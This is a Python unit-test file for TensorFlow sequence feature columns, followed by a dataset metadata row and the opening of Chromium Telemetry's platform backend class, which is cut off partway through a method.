def _assert_sparse_tensor_indices_shape(test_case, expected, actual):
test_case.assertEqual(np.int64, np.array(actual.indices).dtype)
test_case.assertAllEqual(expected.indices, actual.indices)
test_case.assertEqual(np.int64, np.array(actual.dense_shape).dtype)
test_case.assertAllEqual(expected.dense_shape, actual.dense_shape)
def _get_sequence_dense_tensor(column, features):
return column.get_sequence_dense_tensor(
fc.FeatureTransformationCache(features), None)
def _get_sequence_dense_tensor_state(column, features):
state_manager = _TestStateManager()
column.create_state(state_manager)
return column.get_sequence_dense_tensor(
fc.FeatureTransformationCache(features), state_manager)
def _get_sparse_tensors(column, features):
return column.get_sparse_tensors(
fc.FeatureTransformationCache(features), None)
class SequenceCategoricalColumnWithIdentityTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (1, 2, 0),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((1, 2, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': (6, 7, 8),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': (6, 7, 8),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_identity('aaa', num_buckets=9)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceCategoricalColumnWithHashBucketTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('omar', 'stringer', 'marlo'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
# Ignored to avoid hash dependence in test.
'values': np.array((0, 0, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'stringer', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
# Ignored to avoid hash dependence in test.
'values': np.array((0, 0, 0), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_hash_bucket(
'aaa', hash_bucket_size=10)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_indices_shape(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceCategoricalColumnWithVocabularyFileTest(
test.TestCase, parameterized.TestCase):
def _write_vocab(self, vocab_strings, file_name):
vocab_file = os.path.join(self.get_temp_dir(), file_name)
with open(vocab_file, 'w') as f:
f.write('\n'.join(vocab_strings))
return vocab_file
def setUp(self):
super(SequenceCategoricalColumnWithVocabularyFileTest, self).setUp()
vocab_strings = ['omar', 'stringer', 'marlo']
self._wire_vocabulary_file_name = self._write_vocab(vocab_strings,
'wire_vocabulary.txt')
self._wire_vocabulary_size = 3
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('marlo', 'skywalker', 'omar'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((2, -1, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'skywalker', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': np.array((0, -1, 2), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_vocabulary_file(
key='aaa',
vocabulary_file=self._wire_vocabulary_file_name,
vocabulary_size=self._wire_vocabulary_size)
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
def test_get_sparse_tensors_dynamic_zero_length(self):
"""Tests _get_sparse_tensors with a dynamic sequence length."""
inputs = sparse_tensor.SparseTensorValue(
indices=np.zeros((0, 2)), values=[], dense_shape=(2, 0))
expected = sparse_tensor.SparseTensorValue(
indices=np.zeros((0, 3)),
values=np.array((), dtype=np.int64),
dense_shape=(2, 0, 1))
column = sfc.sequence_categorical_column_with_vocabulary_file(
key='aaa',
vocabulary_file=self._wire_vocabulary_file_name,
vocabulary_size=self._wire_vocabulary_size)
input_placeholder_shape = list(inputs.dense_shape)
# Make second dimension (sequence length) dynamic.
input_placeholder_shape[1] = None
input_placeholder = array_ops.sparse_placeholder(
dtypes.string, shape=input_placeholder_shape)
id_weight_pair = _get_sparse_tensors(column, {'aaa': input_placeholder})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
result = id_weight_pair.id_tensor.eval(
session=sess, feed_dict={input_placeholder: inputs})
_assert_sparse_tensor_value(
self, expected, result)
class SequenceCategoricalColumnWithVocabularyListTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
'indices': ((0, 0), (1, 0), (1, 1)),
'values': ('marlo', 'skywalker', 'omar'),
'dense_shape': (2, 2)},
'expected_args': {
'indices': ((0, 0, 0), (1, 0, 0), (1, 1, 0)),
'values': np.array((2, -1, 0), dtype=np.int64),
'dense_shape': (2, 2, 1)}},
{'testcase_name': '3D',
'inputs_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': ('omar', 'skywalker', 'marlo'),
'dense_shape': (2, 2, 2)},
'expected_args': {
'indices': ((0, 0, 2), (1, 0, 0), (1, 2, 0)),
'values': np.array((0, -1, 2), dtype=np.int64),
'dense_shape': (2, 2, 2)}}
)
def test_get_sparse_tensors(self, inputs_args, expected_args):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
expected = sparse_tensor.SparseTensorValue(**expected_args)
column = sfc.sequence_categorical_column_with_vocabulary_list(
key='aaa',
vocabulary_list=('omar', 'stringer', 'marlo'))
id_weight_pair = _get_sparse_tensors(column, {'aaa': inputs})
self.assertIsNone(id_weight_pair.weight_tensor)
with monitored_session.MonitoredSession() as sess:
_assert_sparse_tensor_value(
self, expected, id_weight_pair.id_tensor.eval(session=sess))
class SequenceEmbeddingColumnTest(
test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected': [
# example 0, ids [2]
[[7., 11.], [0., 0.]],
# example 1, ids [0, 1]
[[1., 2.], [3., 5.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [1]
[[3., 5.], [0., 0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [0, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 0, 2),
'dense_shape': (4, 2, 2)},
'expected': [
# example 0, ids [[2]]
[[7., 11.], [0., 0.]],
# example 1, ids [[0, 1], [2]]
[[2, 3.5], [7., 11.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [[1], [0, 2]]
[[3., 5.], [4., 6.5]]]}
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 5.), # id 1
(7., 11.) # id 2
)
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=embedding_dimension,
initializer=_initializer)
embedding_lookup, _ = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': inputs})
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertCountEqual(
('embedding_weights:0',), tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(expected, embedding_lookup.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 2),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2]}
)
def test_sequence_length(self, inputs_args, expected_sequence_length):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=2)
_, sequence_length = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length = [0, 1, 2, 0, 1, 0]
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
embedding_column = fc.embedding_column(
categorical_column, dimension=2)
_, sequence_length = _get_sequence_dense_tensor_state(
embedding_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
class SequenceSharedEmbeddingColumnTest(test.TestCase):
def test_get_sequence_dense_tensor(self):
vocabulary_size = 3
embedding_dimension = 2
embedding_values = (
(1., 2.), # id 0
(3., 5.), # id 1
(7., 11.) # id 2
)
def _initializer(shape, dtype, partition_info):
self.assertAllEqual((vocabulary_size, embedding_dimension), shape)
self.assertEqual(dtypes.float32, dtype)
self.assertIsNone(partition_info)
return embedding_values
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
indices=((0, 0), (1, 0), (1, 1), (3, 0)),
values=(2, 0, 1, 1),
dense_shape=(4, 2))
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [1]
# example 1, ids [0, 2]
# example 2, ids [0]
# example 3, ids []
indices=((0, 0), (1, 0), (1, 1), (2, 0)),
values=(1, 0, 2, 0),
dense_shape=(4, 2))
expected_lookups_a = [
# example 0, ids [2]
[[7., 11.], [0., 0.]],
# example 1, ids [0, 1]
[[1., 2.], [3., 5.]],
# example 2, ids []
[[0., 0.], [0., 0.]],
# example 3, ids [1]
[[3., 5.], [0., 0.]],
]
expected_lookups_b = [
# example 0, ids [1]
[[3., 5.], [0., 0.]],
# example 1, ids [0, 2]
[[1., 2.], [7., 11.]],
# example 2, ids [0]
[[1., 2.], [0., 0.]],
# example 3, ids []
[[0., 0.], [0., 0.]],
]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b],
dimension=embedding_dimension,
initializer=_initializer)
embedding_lookup_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[0]
embedding_lookup_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[0]
global_vars = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
    self.assertCountEqual(('aaa_bbb_shared_embedding:0',),
                          tuple([v.name for v in global_vars]))
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(embedding_values, global_vars[0].eval(session=sess))
self.assertAllEqual(
expected_lookups_a, embedding_lookup_a.eval(session=sess))
self.assertAllEqual(
expected_lookups_b, embedding_lookup_b.eval(session=sess))
def test_sequence_length(self):
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids [0, 1]
indices=((0, 0), (1, 0), (1, 1)),
values=(2, 0, 1),
dense_shape=(2, 2))
expected_sequence_length_a = [1, 2]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [0, 2]
# example 1, ids [1]
indices=((0, 0), (0, 1), (1, 0)),
values=(0, 2, 1),
dense_shape=(2, 2))
expected_sequence_length_b = [2, 1]
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
sequence_length_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[1]
sequence_length_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[1]
with monitored_session.MonitoredSession() as sess:
sequence_length_a = sess.run(sequence_length_a)
self.assertAllEqual(expected_sequence_length_a, sequence_length_a)
self.assertEqual(np.int64, sequence_length_a.dtype)
sequence_length_b = sess.run(sequence_length_b)
self.assertAllEqual(expected_sequence_length_b, sequence_length_b)
self.assertEqual(np.int64, sequence_length_b.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input_a = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length_a = [0, 1, 2, 0, 1, 0]
categorical_column_a = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
sparse_input_b = sparse_tensor.SparseTensorValue(
# example 0, ids [2]
# example 1, ids []
# example 2, ids []
# example 3, ids []
# example 4, ids [1]
# example 5, ids [0, 1]
indices=((0, 0), (4, 0), (5, 0), (5, 1)),
values=(2, 1, 0, 1),
dense_shape=(6, 2))
expected_sequence_length_b = [1, 0, 0, 0, 1, 2]
categorical_column_b = sfc.sequence_categorical_column_with_identity(
key='bbb', num_buckets=vocabulary_size)
shared_embedding_columns = fc.shared_embedding_columns_v2(
[categorical_column_a, categorical_column_b], dimension=2)
sequence_length_a = _get_sequence_dense_tensor(
shared_embedding_columns[0], {'aaa': sparse_input_a})[1]
sequence_length_b = _get_sequence_dense_tensor(
shared_embedding_columns[1], {'bbb': sparse_input_b})[1]
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length_a, sequence_length_a.eval(session=sess))
self.assertAllEqual(
expected_sequence_length_b, sequence_length_b.eval(session=sess))
class SequenceIndicatorColumnTest(test.TestCase, parameterized.TestCase):
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
# example 2, ids []
# example 3, ids [1]
'indices': ((0, 0), (1, 0), (1, 1), (3, 0)),
'values': (2, 0, 1, 1),
'dense_shape': (4, 2)},
'expected': [
# example 0, ids [2]
[[0., 0., 1.], [0., 0., 0.]],
# example 1, ids [0, 1]
[[1., 0., 0.], [0., 1., 0.]],
# example 2, ids []
[[0., 0., 0.], [0., 0., 0.]],
# example 3, ids [1]
[[0., 1., 0.], [0., 0., 0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
# example 2, ids []
# example 3, ids [[1], [2, 2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0),
(3, 0, 0), (3, 1, 0), (3, 1, 1)),
'values': (2, 0, 1, 2, 1, 2, 2),
'dense_shape': (4, 2, 2)},
'expected': [
# example 0, ids [[2]]
[[0., 0., 1.], [0., 0., 0.]],
# example 1, ids [[0, 1], [2]]
[[1., 1., 0.], [0., 0., 1.]],
# example 2, ids []
[[0., 0., 0.], [0., 0., 0.]],
# example 3, ids [[1], [2, 2]]
[[0., 1., 0.], [0., 0., 2.]]]}
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
indicator_tensor, _ = _get_sequence_dense_tensor(
indicator_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected, indicator_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2, 0, 1),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2]},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2, 0, 1, 2),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2]}
)
def test_sequence_length(self, inputs_args, expected_sequence_length):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
vocabulary_size = 3
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
_, sequence_length = _get_sequence_dense_tensor(
indicator_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
vocabulary_size = 3
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, ids []
# example 1, ids [2]
# example 2, ids [0, 1]
# example 3, ids []
# example 4, ids [1]
# example 5, ids []
indices=((1, 0), (2, 0), (2, 1), (4, 0)),
values=(2, 0, 1, 1),
dense_shape=(6, 2))
expected_sequence_length = [0, 1, 2, 0, 1, 0]
categorical_column = sfc.sequence_categorical_column_with_identity(
key='aaa', num_buckets=vocabulary_size)
indicator_column = fc.indicator_column(categorical_column)
_, sequence_length = _get_sequence_dense_tensor(
indicator_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
class SequenceNumericColumnTest(test.TestCase, parameterized.TestCase):
def test_defaults(self):
a = sfc.sequence_numeric_column('aaa')
self.assertEqual('aaa', a.key)
self.assertEqual('aaa', a.name)
self.assertEqual((1,), a.shape)
self.assertEqual(0., a.default_value)
self.assertEqual(dtypes.float32, a.dtype)
self.assertIsNone(a.normalizer_fn)
def test_shape_saved_as_tuple(self):
a = sfc.sequence_numeric_column('aaa', shape=[1, 2])
self.assertEqual((1, 2), a.shape)
def test_shape_must_be_positive_integer(self):
with self.assertRaisesRegexp(TypeError, 'shape dimensions must be integer'):
sfc.sequence_numeric_column('aaa', shape=[1.0])
with self.assertRaisesRegexp(
ValueError, 'shape dimensions must be greater than 0'):
sfc.sequence_numeric_column('aaa', shape=[0])
def test_dtype_is_convertible_to_float(self):
with self.assertRaisesRegexp(
ValueError, 'dtype must be convertible to float'):
sfc.sequence_numeric_column('aaa', dtype=dtypes.string)
def test_normalizer_fn_must_be_callable(self):
with self.assertRaisesRegexp(TypeError, 'must be a callable'):
sfc.sequence_numeric_column('aaa', normalizer_fn='NotACallable')
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, values [0., 1]
# example 1, [10.]
'indices': ((0, 0), (0, 1), (1, 0)),
'values': (0., 1., 10.),
'dense_shape': (2, 2)},
'expected': [
[[0.], [1.]],
[[10.], [0.]]]},
{'testcase_name': '3D',
'inputs_args': {
# feature 0, ids [[20, 3], [5]]
# feature 1, ids [[3], [8]]
'indices': ((0, 0, 0), (0, 0, 1), (0, 1, 0), (1, 0, 0), (1, 1, 0)),
'values': (20, 3, 5., 3., 8.),
'dense_shape': (2, 2, 2)},
'expected': [
[[20.], [3.], [5.], [0.]],
[[3.], [0.], [8.], [0.]]]},
)
def test_get_sequence_dense_tensor(self, inputs_args, expected):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
numeric_column = sfc.sequence_numeric_column('aaa')
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(expected, dense_tensor.eval(session=sess))
def test_get_sequence_dense_tensor_with_normalizer_fn(self):
def _increment_two(input_sparse_tensor):
return sparse_ops.sparse_add(
input_sparse_tensor,
sparse_tensor.SparseTensor(((0, 0), (1, 1)), (2.0, 2.0), (2, 2))
)
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, values [[0.], [1]]
# example 1, [[10.]]
indices=((0, 0), (0, 1), (1, 0)),
values=(0., 1., 10.),
dense_shape=(2, 2))
# Before _increment_two:
# [[0.], [1.]],
# [[10.], [0.]],
# After _increment_two:
# [[2.], [1.]],
# [[10.], [2.]],
expected_dense_tensor = [
[[2.], [1.]],
[[10.], [2.]],
]
numeric_column = sfc.sequence_numeric_column(
'aaa', normalizer_fn=_increment_two)
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_dense_tensor, dense_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'sparse_input_args': {
# example 0, values [[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]]
# example 1, [[[10., 11.], [12., 13.]]]
'indices': ((0, 0), (0, 1), (0, 2), (0, 3), (0, 4), (0, 5), (0, 6),
(0, 7), (1, 0), (1, 1), (1, 2), (1, 3)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 8)},
'expected_dense_tensor': [
[[[0., 1.], [2., 3.]], [[4., 5.], [6., 7.]]],
[[[10., 11.], [12., 13.]], [[0., 0.], [0., 0.]]]]},
{'testcase_name': '3D',
'sparse_input_args': {
'indices': ((0, 0, 0), (0, 0, 2), (0, 0, 4), (0, 0, 6),
(0, 1, 0), (0, 1, 2), (0, 1, 4), (0, 1, 6),
(1, 0, 0), (1, 0, 2), (1, 0, 4), (1, 0, 6)),
'values': (0., 1., 2., 3., 4., 5., 6., 7., 10., 11., 12., 13.),
'dense_shape': (2, 2, 8)},
'expected_dense_tensor': [
[[[0., 0.], [1., 0.]], [[2., 0.], [3., 0.]],
[[4., 0.], [5., 0.]], [[6., 0.], [7., 0.]]],
[[[10., 0.], [11., 0.]], [[12., 0.], [13., 0.]],
[[0., 0.], [0., 0.]], [[0., 0.], [0., 0.]]]]},
)
def test_get_dense_tensor_multi_dim(
self, sparse_input_args, expected_dense_tensor):
"""Tests get_sequence_dense_tensor for multi-dim numeric_column."""
sparse_input = sparse_tensor.SparseTensorValue(**sparse_input_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=(2, 2))
dense_tensor, _ = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_dense_tensor, dense_tensor.eval(session=sess))
@parameterized.named_parameters(
{'testcase_name': '2D',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2., 0., 1.),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 2],
'shape': (1,)},
{'testcase_name': '3D',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2., 0., 1., 2.),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2],
'shape': (1,)},
{'testcase_name': '2D_with_shape',
'inputs_args': {
# example 0, ids [2]
# example 1, ids [0, 1]
'indices': ((0, 0), (1, 0), (1, 1)),
'values': (2., 0., 1.),
'dense_shape': (2, 2)},
'expected_sequence_length': [1, 1],
'shape': (2,)},
{'testcase_name': '3D_with_shape',
'inputs_args': {
# example 0, ids [[2]]
# example 1, ids [[0, 1], [2]]
'indices': ((0, 0, 0), (1, 0, 0), (1, 0, 1), (1, 1, 0)),
'values': (2., 0., 1., 2.),
'dense_shape': (2, 2, 2)},
'expected_sequence_length': [1, 2],
'shape': (2,)},
)
def test_sequence_length(self, inputs_args, expected_sequence_length, shape):
inputs = sparse_tensor.SparseTensorValue(**inputs_args)
numeric_column = sfc.sequence_numeric_column('aaa', shape=shape)
_, sequence_length = _get_sequence_dense_tensor(
numeric_column, {'aaa': inputs})
with monitored_session.MonitoredSession() as sess:
sequence_length = sess.run(sequence_length)
self.assertAllEqual(expected_sequence_length, sequence_length)
self.assertEqual(np.int64, sequence_length.dtype)
def test_sequence_length_with_empty_rows(self):
"""Tests _sequence_length when some examples do not have ids."""
sparse_input = sparse_tensor.SparseTensorValue(
# example 0, values []
# example 1, values [[0.], [1.]]
# example 2, [[2.]]
# example 3, values []
# example 4, [[3.]]
# example 5, values []
indices=((1, 0), (1, 1), (2, 0), (4, 0)),
values=(0., 1., 2., 3.),
dense_shape=(6, 2))
expected_sequence_length = [0, 2, 1, 0, 1, 0]
numeric_column = sfc.sequence_numeric_column('aaa')
_, sequence_length = _get_sequence_dense_tensor(
numeric_column, {'aaa': sparse_input})
with monitored_session.MonitoredSession() as sess:
self.assertAllEqual(
expected_sequence_length, sequence_length.eval(session=sess))
if __name__ == '__main__':
test.main()
| apache-2.0 | 134,761,447,103,843,000 | 39.377049 | 101 | 0.56151 | false |
Workday/OpenFrame | tools/telemetry/telemetry/internal/platform/platform_backend.py | 8 | 8451 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import weakref
from telemetry.internal.forwarders import do_nothing_forwarder
from telemetry.internal.platform import network_controller_backend
from telemetry.internal.platform import tracing_controller_backend
# pylint: disable=unused-argument
class PlatformBackend(object):
def __init__(self, device=None):
""" Initalize an instance of PlatformBackend from a device optionally.
Call sites need to use SupportsDevice before intialization to check
whether this platform backend supports the device.
If device is None, this constructor returns the host platform backend
which telemetry is running on.
Args:
device: an instance of telemetry.core.platform.device.Device.
"""
if device and not self.SupportsDevice(device):
raise ValueError('Unsupported device: %s' % device.name)
self._platform = None
self._running_browser_backends = weakref.WeakSet()
self._network_controller_backend = None
self._tracing_controller_backend = None
self._forwarder_factory = None
def InitPlatformBackend(self):
self._network_controller_backend = (
network_controller_backend.NetworkControllerBackend(self))
self._tracing_controller_backend = (
tracing_controller_backend.TracingControllerBackend(self))
@classmethod
def IsPlatformBackendForHost(cls):
""" Returns whether this platform backend is the platform backend to be used
for the host device which telemetry is running on. """
return False
@classmethod
def SupportsDevice(cls, device):
""" Returns whether this platform backend supports intialization from the
device. """
return False
@classmethod
def CreatePlatformForDevice(cls, device, finder_options):
raise NotImplementedError
def SetPlatform(self, platform):
assert self._platform == None
self._platform = platform
@property
def platform(self):
return self._platform
@property
def is_host_platform(self):
return self._platform.is_host_platform
@property
def running_browser_backends(self):
return list(self._running_browser_backends)
@property
def network_controller_backend(self):
return self._network_controller_backend
@property
def tracing_controller_backend(self):
return self._tracing_controller_backend
@property
def forwarder_factory(self):
if not self._forwarder_factory:
self._forwarder_factory = do_nothing_forwarder.DoNothingForwarderFactory()
return self._forwarder_factory
def GetRemotePort(self, port):
return port
def DidCreateBrowser(self, browser, browser_backend):
browser_options = browser_backend.browser_options
